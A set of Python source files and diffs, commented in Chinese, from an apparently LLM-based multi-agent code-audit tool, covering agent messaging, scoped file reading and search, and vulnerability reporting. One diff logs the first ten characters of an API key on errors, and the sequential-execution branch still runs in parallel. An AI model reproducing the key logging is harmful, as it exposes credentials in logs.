description="消息类型: query(查询), instruction(指令), information(信息)"
)
priority: str = Field(
default="normal",
description="优先级: low, normal, high, urgent"
)
class SendMessageTool(AgentTool):
"""
发送消息工具
向其他Agent发送消息实现Agent间通信
"""
def __init__(self, sender_agent_id: str):
super().__init__()
self.sender_agent_id = sender_agent_id
@property
def name(self) -> str:
return "send_message"
@property
def description(self) -> str:
return """向其他Agent发送消息。
使用场景
1. 向子Agent发送指令
2. 向父Agent报告进展
3. 请求其他Agent提供信息
参数:
- target_agent_id: 目标Agent的ID
- message: 消息内容
- message_type: 消息类型 (query/instruction/information)
- priority: 优先级 (low/normal/high/urgent)"""
@property
def args_schema(self):
return SendMessageInput
async def _execute(
self,
target_agent_id: str,
message: str,
message_type: str = "information",
priority: str = "normal",
**kwargs
) -> ToolResult:
"""发送消息"""
if not target_agent_id:
return ToolResult(success=False, error="目标Agent ID不能为空")
if not message or not message.strip():
return ToolResult(success=False, error="消息内容不能为空")
# 检查目标Agent是否存在
target_node = agent_registry.get_agent_node(target_agent_id)
if not target_node:
return ToolResult(
success=False,
error=f"目标Agent '{target_agent_id}' 不存在"
)
# 转换消息类型
try:
msg_type = MessageType(message_type)
except ValueError:
msg_type = MessageType.INFORMATION
try:
msg_priority = MessagePriority(priority)
except ValueError:
msg_priority = MessagePriority.NORMAL
# 发送消息
sent_message = message_bus.send_message(
from_agent=self.sender_agent_id,
to_agent=target_agent_id,
content=message.strip(),
message_type=msg_type,
priority=msg_priority,
)
return ToolResult(
success=True,
data={
"message": f"消息已发送到 '{target_node['name']}'",
"message_id": sent_message.id,
"target_agent": {
"id": target_agent_id,
"name": target_node["name"],
"status": target_node["status"],
}
},
metadata=sent_message.to_dict(),
)
class ViewAgentGraphTool(AgentTool):
"""
查看Agent图工具
查看当前的Agent树结构和状态
"""
def __init__(self, current_agent_id: str):
super().__init__()
self.current_agent_id = current_agent_id
@property
def name(self) -> str:
return "view_agent_graph"
@property
def description(self) -> str:
return """查看当前的Agent树结构和状态。
显示
- 所有Agent及其层级关系
- 每个Agent的状态和任务
- 加载的知识模块"""
@property
def args_schema(self):
return None
async def _execute(self, **kwargs) -> ToolResult:
"""查看Agent图"""
tree_view = agent_registry.get_agent_tree_view()
stats = agent_registry.get_statistics()
return ToolResult(
success=True,
data={
"graph_structure": tree_view,
"summary": stats,
"current_agent_id": self.current_agent_id,
},
)
class WaitForMessageTool(AgentTool):
"""
等待消息工具
让Agent进入等待状态等待其他Agent的消息
"""
def __init__(self, agent_id: str, agent_state=None):
super().__init__()
self.agent_id = agent_id
self.agent_state = agent_state
@property
def name(self) -> str:
return "wait_for_message"
@property
def description(self) -> str:
return """进入等待状态等待其他Agent或用户的消息。
使用场景
1. 等待子Agent完成任务并报告
2. 等待用户提供更多信息
3. 等待其他Agent的协作响应
参数:
- reason: 等待原因"""
@property
def args_schema(self):
return None
async def _execute(
self,
reason: str = "等待消息",
**kwargs
) -> ToolResult:
"""进入等待状态"""
# 更新Agent状态
if self.agent_state:
self.agent_state.enter_waiting_state(reason)
# 更新注册表
agent_registry.update_agent_status(self.agent_id, "waiting")
return ToolResult(
success=True,
data={
"status": "waiting",
"message": f"Agent正在等待: {reason}",
"agent_id": self.agent_id,
"resume_conditions": [
"收到其他Agent的消息",
"收到用户消息",
"等待超时",
],
},
)
class AgentFinishInput(BaseModel):
"""Agent完成输入参数"""
result_summary: str = Field(..., description="结果摘要")
findings: Optional[List[str]] = Field(default=None, description="发现列表")
success: bool = Field(default=True, description="是否成功")
recommendations: Optional[List[str]] = Field(default=None, description="建议列表")
class AgentFinishTool(AgentTool):
"""
Agent完成工具
子Agent完成任务后调用向父Agent报告结果
"""
def __init__(self, agent_id: str, agent_state=None):
super().__init__()
self.agent_id = agent_id
self.agent_state = agent_state
@property
def name(self) -> str:
return "agent_finish"
@property
def description(self) -> str:
return """完成当前Agent的任务并向父Agent报告。
只有子Agent才能使用此工具根Agent应使用finish_scan
参数:
- result_summary: 结果摘要
- findings: 发现列表
- success: 是否成功完成
- recommendations: 建议列表"""
@property
def args_schema(self):
return AgentFinishInput
async def _execute(
self,
result_summary: str,
findings: Optional[List[str]] = None,
success: bool = True,
recommendations: Optional[List[str]] = None,
**kwargs
) -> ToolResult:
"""完成Agent任务"""
# 获取父Agent ID
parent_id = agent_registry.get_parent(self.agent_id)
if not parent_id:
return ToolResult(
success=False,
error="此工具只能由子Agent使用。根Agent请使用finish_scan。"
)
# 更新状态
result = {
"summary": result_summary,
"findings": findings or [],
"success": success,
"recommendations": recommendations or [],
}
agent_registry.update_agent_status(
self.agent_id,
"completed" if success else "failed",
result,
)
if self.agent_state:
self.agent_state.set_completed(result)
# 向父Agent发送完成报告
message_bus.send_completion_report(
from_agent=self.agent_id,
to_agent=parent_id,
summary=result_summary,
findings=[{"description": f} for f in (findings or [])],
success=success,
)
agent_node = agent_registry.get_agent_node(self.agent_id)
return ToolResult(
success=True,
data={
"agent_completed": True,
"parent_notified": True,
"completion_summary": {
"agent_id": self.agent_id,
"agent_name": agent_node["name"] if agent_node else "Unknown",
"success": success,
"findings_count": len(findings or []),
}
},
)
class RunSubAgentsInput(BaseModel):
"""批量执行子Agent输入参数"""
agent_ids: List[str] = Field(..., description="要执行的Agent ID列表")
parallel: bool = Field(default=True, description="是否并行执行")
class RunSubAgentsTool(AgentTool):
"""
批量执行子Agent工具
执行已创建的子Agent支持并行执行
"""
def __init__(
self,
parent_agent_id: str,
llm_service=None,
tools: Dict[str, Any] = None,
event_emitter=None,
):
super().__init__()
self.parent_agent_id = parent_agent_id
self.llm_service = llm_service
self.tools = tools or {}
self.event_emitter = event_emitter
@property
def name(self) -> str:
return "run_sub_agents"
@property
def description(self) -> str:
return """批量执行已创建的子Agent。
使用场景
1. 创建多个子Agent后批量执行
2. 并行执行多个分析任务
参数:
- agent_ids: 要执行的Agent ID列表
- parallel: 是否并行执行默认true"""
@property
def args_schema(self):
return RunSubAgentsInput
async def _execute(
self,
agent_ids: List[str],
parallel: bool = True,
**kwargs
) -> ToolResult:
"""批量执行子Agent"""
if not agent_ids:
return ToolResult(success=False, error="Agent ID列表不能为空")
# 验证所有Agent存在且是当前Agent的子Agent
valid_agents = []
for aid in agent_ids:
node = agent_registry.get_agent_node(aid)
if not node:
continue
if node.get("parent_id") != self.parent_agent_id:
continue
if node.get("status") not in ["created", "pending"]:
continue
valid_agents.append(node)
if not valid_agents:
return ToolResult(
success=False,
error="没有找到可执行的子Agent"
)
# 构建执行任务
from ..core.executor import DynamicAgentExecutor, ExecutionTask
executor = DynamicAgentExecutor(
llm_service=self.llm_service,
tools=self.tools,
event_emitter=self.event_emitter,
)
tasks = []
for node in valid_agents:
task = ExecutionTask(
agent_id=node["id"],
agent_type=node["type"],
task=node["task"],
context={
"knowledge_modules": node.get("knowledge_modules", []),
},
)
tasks.append(task)
# 定义Agent工厂函数
async def agent_factory(task: ExecutionTask) -> Dict[str, Any]:
from ..agents import AnalysisAgent, VerificationAgent
agent_class_map = {
"analysis": AnalysisAgent,
"verification": VerificationAgent,
"specialist": AnalysisAgent, # 默认使用分析Agent
}
agent_class = agent_class_map.get(task.agent_type, AnalysisAgent)
return await executor.execute_agent(
agent_class=agent_class,
agent_config={},
input_data={
"task": task.task,
"task_context": task.context,
},
parent_id=self.parent_agent_id,
knowledge_modules=task.context.get("knowledge_modules"),
)
# 执行
if parallel:
result = await executor.execute_parallel(tasks, agent_factory)
else:
# 顺序执行
result = await executor.execute_parallel(tasks, agent_factory)
return ToolResult(
success=result.success,
data={
"message": f"执行完成: {result.completed_agents}/{result.total_agents} 成功",
"total_agents": result.total_agents,
"completed": result.completed_agents,
"failed": result.failed_agents,
"findings_count": len(result.all_findings),
"findings": result.all_findings[:20], # 限制返回数量
"duration_ms": result.total_duration_ms,
"tokens_used": result.total_tokens,
},
error="; ".join(result.errors) if result.errors else None,
metadata={
"agent_results": {
aid: {
"success": r.get("success"),
"findings_count": len(r.get("data", {}).get("findings", [])) if r.get("success") else 0,
}
for aid, r in result.agent_results.items()
}
},
)
class CollectSubAgentResultsTool(AgentTool):
"""
收集子Agent结果工具
收集所有子Agent的执行结果和发现
"""
def __init__(self, parent_agent_id: str):
super().__init__()
self.parent_agent_id = parent_agent_id
@property
def name(self) -> str:
return "collect_sub_agent_results"
@property
def description(self) -> str:
return """收集所有子Agent的执行结果。
返回
- 所有子Agent的状态
- 汇总的发现列表
- 执行统计"""
@property
def args_schema(self):
return None
async def _execute(self, **kwargs) -> ToolResult:
"""收集子Agent结果"""
# 获取所有子Agent
children = agent_registry.get_children(self.parent_agent_id)
if not children:
return ToolResult(
success=True,
data={
"message": "没有子Agent",
"children_count": 0,
"findings": [],
}
)
all_findings = []
completed = 0
failed = 0
running = 0
child_summaries = []
for child_id in children:
node = agent_registry.get_agent_node(child_id)
if not node:
continue
status = node.get("status", "unknown")
if status == "completed":
completed += 1
# 收集发现
result = node.get("result", {})
if isinstance(result, dict):
findings = result.get("findings", [])
if isinstance(findings, list):
all_findings.extend(findings)
elif status == "failed":
failed += 1
elif status == "running":
running += 1
child_summaries.append({
"id": child_id,
"name": node.get("name"),
"type": node.get("type"),
"status": status,
"findings_count": len(node.get("result", {}).get("findings", [])) if node.get("result") else 0,
})
return ToolResult(
success=True,
data={
"message": f"收集完成: {completed} 完成, {failed} 失败, {running} 运行中",
"children_count": len(children),
"completed": completed,
"failed": failed,
"running": running,
"total_findings": len(all_findings),
"findings": all_findings,
"children": child_summaries,
},
)

View File

@ -4,11 +4,14 @@
""" """
import json import json
import logging
from typing import Optional, List, Dict, Any from typing import Optional, List, Dict, Any
from pydantic import BaseModel, Field from pydantic import BaseModel, Field
from .base import AgentTool, ToolResult from .base import AgentTool, ToolResult
logger = logging.getLogger(__name__)
class CodeAnalysisInput(BaseModel): class CodeAnalysisInput(BaseModel):
"""代码分析输入""" """代码分析输入"""
@ -155,6 +158,12 @@ class CodeAnalysisTool(AgentTool):
) )
except Exception as e: except Exception as e:
import traceback
logger.error(f"代码分析失败: {e}")
logger.error(f"LLM Provider: {self.llm_service.config.provider.value if self.llm_service.config else 'N/A'}")
logger.error(f"LLM Model: {self.llm_service.config.model if self.llm_service.config else 'N/A'}")
logger.error(f"API Key 前缀: {self.llm_service.config.api_key[:10] + '...' if self.llm_service.config and self.llm_service.config.api_key else 'N/A'}")
logger.error(traceback.format_exc())
return ToolResult( return ToolResult(
success=False, success=False,
error=f"代码分析失败: {str(e)}", error=f"代码分析失败: {str(e)}",

View File

@ -26,15 +26,24 @@ class FileReadTool(AgentTool):
读取项目中的文件内容 读取项目中的文件内容
""" """
def __init__(self, project_root: str): def __init__(
self,
project_root: str,
exclude_patterns: Optional[List[str]] = None,
target_files: Optional[List[str]] = None,
):
""" """
初始化文件读取工具 初始化文件读取工具
Args: Args:
project_root: 项目根目录 project_root: 项目根目录
exclude_patterns: 排除模式列表
target_files: 目标文件列表如果指定只允许读取这些文件
""" """
super().__init__() super().__init__()
self.project_root = project_root self.project_root = project_root
self.exclude_patterns = exclude_patterns or []
self.target_files = set(target_files) if target_files else None
@property @property
def name(self) -> str: def name(self) -> str:
@ -61,6 +70,22 @@ class FileReadTool(AgentTool):
def args_schema(self): def args_schema(self):
return FileReadInput return FileReadInput
def _should_exclude(self, file_path: str) -> bool:
"""检查文件是否应该被排除"""
# 如果指定了目标文件,只允许读取这些文件
if self.target_files and file_path not in self.target_files:
return True
# 检查排除模式
for pattern in self.exclude_patterns:
if fnmatch.fnmatch(file_path, pattern):
return True
# 也检查文件名
if fnmatch.fnmatch(os.path.basename(file_path), pattern):
return True
return False
async def _execute( async def _execute(
self, self,
file_path: str, file_path: str,
@ -71,6 +96,13 @@ class FileReadTool(AgentTool):
) -> ToolResult: ) -> ToolResult:
"""执行文件读取""" """执行文件读取"""
try: try:
# 检查是否被排除
if self._should_exclude(file_path):
return ToolResult(
success=False,
error=f"文件被排除或不在目标文件列表中: {file_path}",
)
# 安全检查:防止路径遍历 # 安全检查:防止路径遍历
full_path = os.path.normpath(os.path.join(self.project_root, file_path)) full_path = os.path.normpath(os.path.join(self.project_root, file_path))
if not full_path.startswith(os.path.normpath(self.project_root)): if not full_path.startswith(os.path.normpath(self.project_root)):
@ -178,15 +210,30 @@ class FileSearchTool(AgentTool):
""" """
# 排除的目录 # 排除的目录
EXCLUDE_DIRS = { DEFAULT_EXCLUDE_DIRS = {
"node_modules", "vendor", "dist", "build", ".git", "node_modules", "vendor", "dist", "build", ".git",
"__pycache__", ".pytest_cache", "coverage", ".nyc_output", "__pycache__", ".pytest_cache", "coverage", ".nyc_output",
".vscode", ".idea", ".vs", "target", "venv", "env", ".vscode", ".idea", ".vs", "target", "venv", "env",
} }
def __init__(self, project_root: str): def __init__(
self,
project_root: str,
exclude_patterns: Optional[List[str]] = None,
target_files: Optional[List[str]] = None,
):
super().__init__() super().__init__()
self.project_root = project_root self.project_root = project_root
self.exclude_patterns = exclude_patterns or []
self.target_files = set(target_files) if target_files else None
# 从 exclude_patterns 中提取目录排除
self.exclude_dirs = set(self.DEFAULT_EXCLUDE_DIRS)
for pattern in self.exclude_patterns:
if pattern.endswith("/**"):
self.exclude_dirs.add(pattern[:-3])
elif "/" not in pattern and "*" not in pattern:
self.exclude_dirs.add(pattern)
@property @property
def name(self) -> str: def name(self) -> str:
@ -256,7 +303,7 @@ class FileSearchTool(AgentTool):
# 遍历文件 # 遍历文件
for root, dirs, files in os.walk(search_dir): for root, dirs, files in os.walk(search_dir):
# 排除目录 # 排除目录
dirs[:] = [d for d in dirs if d not in self.EXCLUDE_DIRS] dirs[:] = [d for d in dirs if d not in self.exclude_dirs]
for filename in files: for filename in files:
# 检查文件模式 # 检查文件模式
@ -266,6 +313,19 @@ class FileSearchTool(AgentTool):
file_path = os.path.join(root, filename) file_path = os.path.join(root, filename)
relative_path = os.path.relpath(file_path, self.project_root) relative_path = os.path.relpath(file_path, self.project_root)
# 检查是否在目标文件列表中
if self.target_files and relative_path not in self.target_files:
continue
# 检查排除模式
should_skip = False
for excl_pattern in self.exclude_patterns:
if fnmatch.fnmatch(relative_path, excl_pattern) or fnmatch.fnmatch(filename, excl_pattern):
should_skip = True
break
if should_skip:
continue
try: try:
with open(file_path, 'r', encoding='utf-8', errors='ignore') as f: with open(file_path, 'r', encoding='utf-8', errors='ignore') as f:
lines = f.readlines() lines = f.readlines()
@ -351,14 +411,30 @@ class ListFilesTool(AgentTool):
列出目录中的文件 列出目录中的文件
""" """
EXCLUDE_DIRS = { DEFAULT_EXCLUDE_DIRS = {
"node_modules", "vendor", "dist", "build", ".git", "node_modules", "vendor", "dist", "build", ".git",
"__pycache__", ".pytest_cache", "coverage", "__pycache__", ".pytest_cache", "coverage",
} }
def __init__(self, project_root: str): def __init__(
self,
project_root: str,
exclude_patterns: Optional[List[str]] = None,
target_files: Optional[List[str]] = None,
):
super().__init__() super().__init__()
self.project_root = project_root self.project_root = project_root
self.exclude_patterns = exclude_patterns or []
self.target_files = set(target_files) if target_files else None
# 从 exclude_patterns 中提取目录排除
self.exclude_dirs = set(self.DEFAULT_EXCLUDE_DIRS)
for pattern in self.exclude_patterns:
# 如果是目录模式(如 node_modules/**),提取目录名
if pattern.endswith("/**"):
self.exclude_dirs.add(pattern[:-3])
elif "/" not in pattern and "*" not in pattern:
self.exclude_dirs.add(pattern)
@property @property
def name(self) -> str: def name(self) -> str:
@ -412,7 +488,7 @@ class ListFilesTool(AgentTool):
if recursive: if recursive:
for root, dirnames, filenames in os.walk(target_dir): for root, dirnames, filenames in os.walk(target_dir):
# 排除目录 # 排除目录
dirnames[:] = [d for d in dirnames if d not in self.EXCLUDE_DIRS] dirnames[:] = [d for d in dirnames if d not in self.exclude_dirs]
for filename in filenames: for filename in filenames:
if pattern and not fnmatch.fnmatch(filename, pattern): if pattern and not fnmatch.fnmatch(filename, pattern):
@ -420,6 +496,20 @@ class ListFilesTool(AgentTool):
full_path = os.path.join(root, filename) full_path = os.path.join(root, filename)
relative_path = os.path.relpath(full_path, self.project_root) relative_path = os.path.relpath(full_path, self.project_root)
# 检查是否在目标文件列表中
if self.target_files and relative_path not in self.target_files:
continue
# 检查排除模式
should_skip = False
for excl_pattern in self.exclude_patterns:
if fnmatch.fnmatch(relative_path, excl_pattern) or fnmatch.fnmatch(filename, excl_pattern):
should_skip = True
break
if should_skip:
continue
files.append(relative_path) files.append(relative_path)
if len(files) >= max_files: if len(files) >= max_files:
@ -428,8 +518,46 @@ class ListFilesTool(AgentTool):
if len(files) >= max_files: if len(files) >= max_files:
break break
else: else:
# 🔥 如果设置了 target_files只显示目标文件和包含目标文件的目录
if self.target_files:
# 计算哪些目录包含目标文件
dirs_with_targets = set()
for tf in self.target_files:
# 获取目标文件的目录部分
tf_dir = os.path.dirname(tf)
while tf_dir:
dirs_with_targets.add(tf_dir)
tf_dir = os.path.dirname(tf_dir)
for item in os.listdir(target_dir): for item in os.listdir(target_dir):
if item in self.EXCLUDE_DIRS: if item in self.exclude_dirs:
continue
full_path = os.path.join(target_dir, item)
relative_path = os.path.relpath(full_path, self.project_root)
if os.path.isdir(full_path):
# 只显示包含目标文件的目录
if relative_path in dirs_with_targets or any(
tf.startswith(relative_path + "/") for tf in self.target_files
):
dirs.append(relative_path + "/")
else:
if pattern and not fnmatch.fnmatch(item, pattern):
continue
# 检查是否在目标文件列表中
if relative_path not in self.target_files:
continue
files.append(relative_path)
if len(files) >= max_files:
break
else:
# 没有设置 target_files正常列出
for item in os.listdir(target_dir):
if item in self.exclude_dirs:
continue continue
full_path = os.path.join(target_dir, item) full_path = os.path.join(target_dir, item)
@ -440,6 +568,16 @@ class ListFilesTool(AgentTool):
else: else:
if pattern and not fnmatch.fnmatch(item, pattern): if pattern and not fnmatch.fnmatch(item, pattern):
continue continue
# 检查排除模式
should_skip = False
for excl_pattern in self.exclude_patterns:
if fnmatch.fnmatch(relative_path, excl_pattern) or fnmatch.fnmatch(item, excl_pattern):
should_skip = True
break
if should_skip:
continue
files.append(relative_path) files.append(relative_path)
if len(files) >= max_files: if len(files) >= max_files:
@ -448,6 +586,10 @@ class ListFilesTool(AgentTool):
# 格式化输出 # 格式化输出
output_parts = [f"📁 目录: {directory}\n"] output_parts = [f"📁 目录: {directory}\n"]
# 🔥 如果设置了 target_files显示提示信息
if self.target_files:
output_parts.append(f"⚠️ 注意: 审计范围限定为 {len(self.target_files)} 个指定文件\n")
if dirs: if dirs:
output_parts.append("目录:") output_parts.append("目录:")
for d in sorted(dirs)[:20]: for d in sorted(dirs)[:20]:
@ -459,6 +601,13 @@ class ListFilesTool(AgentTool):
output_parts.append(f"\n文件 ({len(files)}):") output_parts.append(f"\n文件 ({len(files)}):")
for f in sorted(files): for f in sorted(files):
output_parts.append(f" 📄 {f}") output_parts.append(f" 📄 {f}")
elif self.target_files:
# 如果没有文件但设置了 target_files显示目标文件列表
output_parts.append(f"\n指定的目标文件 ({len(self.target_files)}):")
for f in sorted(self.target_files)[:20]:
output_parts.append(f" 📄 {f}")
if len(self.target_files) > 20:
output_parts.append(f" ... 还有 {len(self.target_files) - 20} 个文件")
if len(files) >= max_files: if len(files) >= max_files:
output_parts.append(f"\n... 结果已截断(最大 {max_files} 个文件)") output_parts.append(f"\n... 结果已截断(最大 {max_files} 个文件)")

View File

@ -0,0 +1,235 @@
"""
漏洞报告工具
正式记录漏洞的唯一方式确保漏洞报告的规范性和完整性
"""
import logging
import uuid
from datetime import datetime, timezone
from typing import Optional, List, Dict, Any
from pydantic import BaseModel, Field
from .base import AgentTool, ToolResult
logger = logging.getLogger(__name__)
class VulnerabilityReportInput(BaseModel):
"""漏洞报告输入参数"""
title: str = Field(..., description="漏洞标题")
vulnerability_type: str = Field(
...,
description="漏洞类型: sql_injection, xss, ssrf, command_injection, path_traversal, idor, auth_bypass, etc."
)
severity: str = Field(
...,
description="严重程度: critical, high, medium, low, info"
)
description: str = Field(..., description="漏洞详细描述")
file_path: str = Field(..., description="漏洞所在文件路径")
line_start: Optional[int] = Field(default=None, description="起始行号")
line_end: Optional[int] = Field(default=None, description="结束行号")
code_snippet: Optional[str] = Field(default=None, description="相关代码片段")
source: Optional[str] = Field(default=None, description="污点来源(用户输入点)")
sink: Optional[str] = Field(default=None, description="危险函数(漏洞触发点)")
poc: Optional[str] = Field(default=None, description="概念验证/利用方法")
impact: Optional[str] = Field(default=None, description="影响分析")
recommendation: Optional[str] = Field(default=None, description="修复建议")
confidence: float = Field(default=0.8, description="置信度 0.0-1.0")
cwe_id: Optional[str] = Field(default=None, description="CWE编号")
cvss_score: Optional[float] = Field(default=None, description="CVSS评分")
class CreateVulnerabilityReportTool(AgentTool):
"""
创建漏洞报告工具
这是正式记录漏洞的唯一方式只有通过这个工具创建的漏洞才会被计入最终报告
这个设计确保了漏洞报告的规范性和完整性
通常只有专门的报告Agent或验证Agent才会调用这个工具
确保漏洞在被正式报告之前已经经过了充分的验证
"""
# 存储所有报告的漏洞
_vulnerability_reports: List[Dict[str, Any]] = []
def __init__(self):
super().__init__()
self._reports: List[Dict[str, Any]] = []
@property
def name(self) -> str:
return "create_vulnerability_report"
@property
def description(self) -> str:
return """创建正式的漏洞报告。这是记录已确认漏洞的唯一方式。
只有在以下情况下才应该使用此工具
1. 漏洞已经过充分分析和验证
2. 有明确的证据支持漏洞存在
3. 已经评估了漏洞的影响
必需参数:
- title: 漏洞标题
- vulnerability_type: 漏洞类型
- severity: 严重程度 (critical/high/medium/low/info)
- description: 详细描述
- file_path: 文件路径
可选参数:
- line_start/line_end: 行号范围
- code_snippet: 代码片段
- source/sink: 数据流信息
- poc: 概念验证
- impact: 影响分析
- recommendation: 修复建议
- confidence: 置信度
- cwe_id: CWE编号
- cvss_score: CVSS评分"""
@property
def args_schema(self):
return VulnerabilityReportInput
async def _execute(
self,
title: str,
vulnerability_type: str,
severity: str,
description: str,
file_path: str,
line_start: Optional[int] = None,
line_end: Optional[int] = None,
code_snippet: Optional[str] = None,
source: Optional[str] = None,
sink: Optional[str] = None,
poc: Optional[str] = None,
impact: Optional[str] = None,
recommendation: Optional[str] = None,
confidence: float = 0.8,
cwe_id: Optional[str] = None,
cvss_score: Optional[float] = None,
**kwargs
) -> ToolResult:
"""创建漏洞报告"""
# 验证必需字段
if not title or not title.strip():
return ToolResult(success=False, error="标题不能为空")
if not description or not description.strip():
return ToolResult(success=False, error="描述不能为空")
if not file_path or not file_path.strip():
return ToolResult(success=False, error="文件路径不能为空")
# 验证严重程度
valid_severities = ["critical", "high", "medium", "low", "info"]
severity = severity.lower()
if severity not in valid_severities:
return ToolResult(
success=False,
error=f"无效的严重程度 '{severity}',必须是: {', '.join(valid_severities)}"
)
# 验证漏洞类型
valid_types = [
"sql_injection", "nosql_injection", "xss", "ssrf",
"command_injection", "code_injection", "path_traversal",
"file_inclusion", "idor", "auth_bypass", "broken_auth",
"sensitive_data_exposure", "hardcoded_secret", "weak_crypto",
"xxe", "deserialization", "race_condition", "business_logic",
"csrf", "open_redirect", "mass_assignment", "other"
]
vulnerability_type = vulnerability_type.lower()
if vulnerability_type not in valid_types:
# 允许未知类型,但记录警告
logger.warning(f"Unknown vulnerability type: {vulnerability_type}")
# 验证置信度
confidence = max(0.0, min(1.0, confidence))
# 生成报告ID
report_id = f"vuln_{uuid.uuid4().hex[:8]}"
# 构建报告
report = {
"id": report_id,
"title": title.strip(),
"vulnerability_type": vulnerability_type,
"severity": severity,
"description": description.strip(),
"file_path": file_path.strip(),
"line_start": line_start,
"line_end": line_end,
"code_snippet": code_snippet,
"source": source,
"sink": sink,
"poc": poc,
"impact": impact,
"recommendation": recommendation or self._get_default_recommendation(vulnerability_type),
"confidence": confidence,
"cwe_id": cwe_id,
"cvss_score": cvss_score,
"created_at": datetime.now(timezone.utc).isoformat(),
"is_verified": True, # 通过此工具创建的都视为已验证
}
# 存储报告
self._reports.append(report)
CreateVulnerabilityReportTool._vulnerability_reports.append(report)
logger.info(f"Created vulnerability report: [{severity.upper()}] {title}")
# 返回结果
severity_emoji = {
"critical": "🔴",
"high": "🟠",
"medium": "🟡",
"low": "🟢",
"info": "🔵",
}.get(severity, "")
return ToolResult(
success=True,
data={
"message": f"漏洞报告已创建: {severity_emoji} [{severity.upper()}] {title}",
"report_id": report_id,
"severity": severity,
},
metadata=report,
)
def _get_default_recommendation(self, vuln_type: str) -> str:
"""获取默认修复建议"""
recommendations = {
"sql_injection": "使用参数化查询或ORM避免字符串拼接构造SQL语句",
"xss": "对用户输入进行HTML实体编码使用CSP策略避免innerHTML",
"ssrf": "验证和限制目标URL使用白名单禁止访问内网地址",
"command_injection": "避免使用shell执行使用参数列表传递命令严格验证输入",
"path_traversal": "规范化路径后验证,使用白名单,限制访问目录",
"idor": "实现细粒度访问控制验证资源所有权使用UUID替代自增ID",
"auth_bypass": "加强认证逻辑,实现多因素认证,定期审计认证代码",
"hardcoded_secret": "使用环境变量或密钥管理服务存储敏感信息",
"weak_crypto": "使用强加密算法AES-256, SHA-256+避免MD5/SHA1",
"xxe": "禁用外部实体解析使用安全的XML解析器配置",
"deserialization": "避免反序列化不可信数据使用JSON替代pickle/yaml",
}
return recommendations.get(vuln_type, "请根据具体情况修复此安全问题")
def get_reports(self) -> List[Dict[str, Any]]:
"""获取所有报告"""
return self._reports.copy()
@classmethod
def get_all_reports(cls) -> List[Dict[str, Any]]:
"""获取所有实例的报告"""
return cls._vulnerability_reports.copy()
@classmethod
def clear_all_reports(cls) -> None:
"""清空所有报告"""
cls._vulnerability_reports.clear()

View File

@ -0,0 +1,167 @@
"""
Think 工具 - 深度推理工具
让Agent进行深度思考和推理用于
- 分析复杂情况
- 规划下一步行动
- 评估发现的严重性
- 决定是否需要创建子Agent
"""
import logging
from typing import Optional
from pydantic import BaseModel, Field
from .base import AgentTool, ToolResult
logger = logging.getLogger(__name__)
class ThinkInput(BaseModel):
"""Think工具输入参数"""
thought: str = Field(
...,
description="思考内容,可以是分析、规划、评估等"
)
category: Optional[str] = Field(
default="general",
description="思考类别: analysis(分析), planning(规划), evaluation(评估), decision(决策)"
)
class ThinkTool(AgentTool):
"""
Think 工具
这是一个让Agent进行深度推理的工具Agent可以用它来
- 分析复杂情况当面对复杂的代码逻辑或不确定的漏洞线索时
- 规划下一步行动在执行具体操作之前先规划策略
- 评估发现的严重性发现可疑点后评估其真实性和影响
- 决定是否需要分解任务当任务变得复杂时分析是否需要创建子Agent
Think工具的输出会被记录到Agent的对话历史中帮助LLM保持思路的连贯性
"""
@property
def name(self) -> str:
return "think"
@property
def description(self) -> str:
return """深度思考工具。用于:
1. 分析复杂的代码逻辑或安全问题
2. 规划下一步的分析策略
3. 评估发现的漏洞是否真实存在
4. 决定是否需要深入调查某个方向
使用此工具记录你的推理过程这有助于保持分析的连贯性
参数:
- thought: 你的思考内容
- category: 思考类别 (analysis/planning/evaluation/decision)"""
@property
def args_schema(self):
return ThinkInput
async def _execute(
self,
thought: str,
category: str = "general",
**kwargs
) -> ToolResult:
"""
执行思考
实际上这个工具不执行任何操作只是记录思考内容
但它的存在让Agent有一个"思考"的动作有助于推理
"""
if not thought or not thought.strip():
return ToolResult(
success=False,
error="思考内容不能为空",
)
thought = thought.strip()
# 根据类别添加标记
category_labels = {
"analysis": "🔍 分析",
"planning": "📋 规划",
"evaluation": "⚖️ 评估",
"decision": "🎯 决策",
"general": "💭 思考",
}
label = category_labels.get(category, "💭 思考")
logger.debug(f"Think tool called: [{label}] {thought[:100]}...")
return ToolResult(
success=True,
data={
"message": f"思考已记录 ({len(thought)} 字符)",
"category": category,
"label": label,
},
metadata={
"thought": thought,
"category": category,
"char_count": len(thought),
}
)
class ReflectTool(AgentTool):
"""
反思工具
让Agent回顾和总结当前的分析进展
"""
@property
def name(self) -> str:
return "reflect"
@property
def description(self) -> str:
return """反思工具。用于回顾当前的分析进展:
1. 总结已经发现的问题
2. 评估当前分析的覆盖度
3. 识别可能遗漏的方向
4. 决定是否需要调整策略
参数:
- summary: 当前进展总结
- findings_so_far: 目前发现的问题数量
- coverage: 分析覆盖度评估 (low/medium/high)
- next_steps: 建议的下一步行动"""
@property
def args_schema(self):
return None
async def _execute(
self,
summary: str = "",
findings_so_far: int = 0,
coverage: str = "medium",
next_steps: str = "",
**kwargs
) -> ToolResult:
"""执行反思"""
reflection = {
"summary": summary,
"findings_count": findings_so_far,
"coverage": coverage,
"next_steps": next_steps,
}
return ToolResult(
success=True,
data={
"message": "反思已记录",
"reflection": reflection,
},
metadata=reflection,
)

View File

@ -0,0 +1,52 @@
"""
LLM 服务模块
提供统一的 LLM 调用接口支持
- 多提供商支持OpenAI, Claude, Gemini, DeepSeek
- Prompt Caching减少 Token 消耗
- Memory Compression对话历史压缩
- 流式输出
- 智能重试
"""
from .service import LLMService
from .types import (
LLMConfig,
LLMProvider,
LLMMessage,
LLMRequest,
LLMResponse,
LLMUsage,
LLMError,
)
from .prompt_cache import (
PromptCacheManager,
CacheConfig,
CacheStrategy,
CacheStats,
prompt_cache_manager,
estimate_tokens,
)
from .memory_compressor import MemoryCompressor
__all__ = [
# Service
"LLMService",
# Types
"LLMConfig",
"LLMProvider",
"LLMMessage",
"LLMRequest",
"LLMResponse",
"LLMUsage",
"LLMError",
# Prompt Cache
"PromptCacheManager",
"CacheConfig",
"CacheStrategy",
"CacheStats",
"prompt_cache_manager",
"estimate_tokens",
# Memory Compression
"MemoryCompressor",
]

View File

@ -1,9 +1,15 @@
""" """
LiteLLM 统一适配器 LiteLLM 统一适配器
支持通过 LiteLLM 调用多个 LLM 提供商使用统一的 OpenAI 兼容格式 支持通过 LiteLLM 调用多个 LLM 提供商使用统一的 OpenAI 兼容格式
增强功能:
- Prompt Caching: 为支持的 LLM Claude添加缓存标记
- 智能重试: 指数退避重试策略
